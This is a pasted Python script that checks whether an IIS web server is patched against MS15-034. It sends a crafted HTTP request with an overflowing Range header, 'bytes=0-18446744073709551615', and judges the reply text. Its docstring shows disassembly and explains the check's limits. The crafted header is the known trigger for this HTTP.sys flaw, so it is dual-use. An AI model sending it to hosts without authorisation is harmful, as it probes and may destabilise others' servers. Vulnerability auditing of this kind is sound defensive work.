
MS15-034 Checker

a guest Apr 14th, 2015 37,791 Never
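r'''
___.                                   .___ __                         __
\_ |__   ____ ___.__. ____   ____    __| _//  |________ __ __  _______/  |_
| __ \_/ __ <   |  |/  _ \ /    \ / __ |\  __\_  __ \ |  \/  ___/\  __\
| \_\ \ ___/\___  (  <_> )   |  \/ /_/ | |  |  |  | \/  |  /\___ \ |  |
|___  /\___  > ____|\____/|___|  /\____ | |__|  |__|  |____//____  > |__|
    \/     \/\/                \/      \/                        \/
                                                           MS15-034 Checker

Danger! This script has not been properly qa'd and will probably fail in terrible ways.
It is based off a change in HTTP!UlpParseRange in which an error code is returned as a
result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of
an HTTP range request.
-BF


8a8b2112 56              push    esi
8a8b2113 6a00            push    0
8a8b2115 2bc7            sub     eax,edi
8a8b2117 6a01            push    1
8a8b2119 1bca            sbb     ecx,edx
8a8b211b 51              push    ecx
8a8b211c 50              push    eax
8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here

How the check works
-------------------
Two plain-HTTP requests are sent to port 80 of ``ipAddr``:

1. ``GET / HTTP/1.0``; the script stops with "Not IIS" unless the reply
   contains the string "Microsoft".
2. ``GET / HTTP/1.1`` with ``Range: bytes=0-18446744073709551615``; a reply
   containing "Requested Range Not Satisfiable" is reported as vulnerable, a
   reply containing " The request has an invalid header name" as patched, and
   anything else as inconclusive.

Limits of the result
--------------------
* The IIS test is a banner match, so a host that hides or rewrites its banner
  is reported as "Not IIS" and never receives the ranged request.
* Only the first 1024 bytes of each reply are inspected, only ``/`` is
  requested, and only port 80 without TLS is contacted.
* Whatever sits in front of the server (reverse proxy, load balancer, WAF)
  may answer either request itself, so neither verdict is authoritative.
  Confirm the patch level from the host's installed-update inventory.

The docstring is a raw string because the banner is full of backslashes that
would otherwise be read as escape sequences.
'''
import socket
import random  # NOTE(review): never used by this script; kept so the import list is unchanged

# Host to audit. Must be filled in before the script is run.
ipAddr = ""
# Decimal form of 2**64 - 1 (0xFFFFFFFFFFFFFFFF); despite the name, not a hex string.
hexAllFfff = "18446744073709551615"

req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

PORT = 80
# Without a timeout a filtered or silent host blocks connect()/recv() forever.
TIMEOUT_SECONDS = 10
MAX_RESPONSE_BYTES = 1024


def fetch(host, request):
    """Send *request* to *host* on port 80 and return the first chunk of the reply.

    A single ``recv`` of at most 1024 bytes is performed, as in the original
    script, so a reply split across TCP segments may be truncated. The socket
    is always closed, including when the connection or the read fails.

    Raises ``socket.error`` (which covers ``socket.timeout``) on network failure.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.settimeout(TIMEOUT_SECONDS)
        sock.connect((host, PORT))
        # sendall() retries short writes; encode() keeps this working when the
        # interpreter's socket API requires bytes.
        sock.sendall(request.encode("ascii"))
        # latin-1 maps every byte to a character, so decoding cannot fail on
        # arbitrary response bytes.
        return sock.recv(MAX_RESPONSE_BYTES).decode("latin-1")
    finally:
        sock.close()


def main():
    """Run the two-request check against ``ipAddr`` and print the verdict."""
    print("[*] Audit Started")
    if not ipAddr:
        # An empty host makes connect() target the local machine, which is
        # almost never what the operator meant.
        print("[!] No target set: assign the host to ipAddr first")
        raise SystemExit(1)

    try:
        boringResp = fetch(ipAddr, req1)
        if "Microsoft" not in boringResp:
            print("[*] Not IIS")
            raise SystemExit(0)
        goodResp = fetch(ipAddr, req)
    except socket.error as err:
        print("[!] Connection problem: %s" % err)
        raise SystemExit(1)

    if "Requested Range Not Satisfiable" in goodResp:
        print("[!!] Looks VULN")
    elif " The request has an invalid header name" in goodResp:
        print("[*] Looks Patched")
    else:
        print("[*] Unexpected response, cannot discern patch status")


if __name__ == "__main__":
    main()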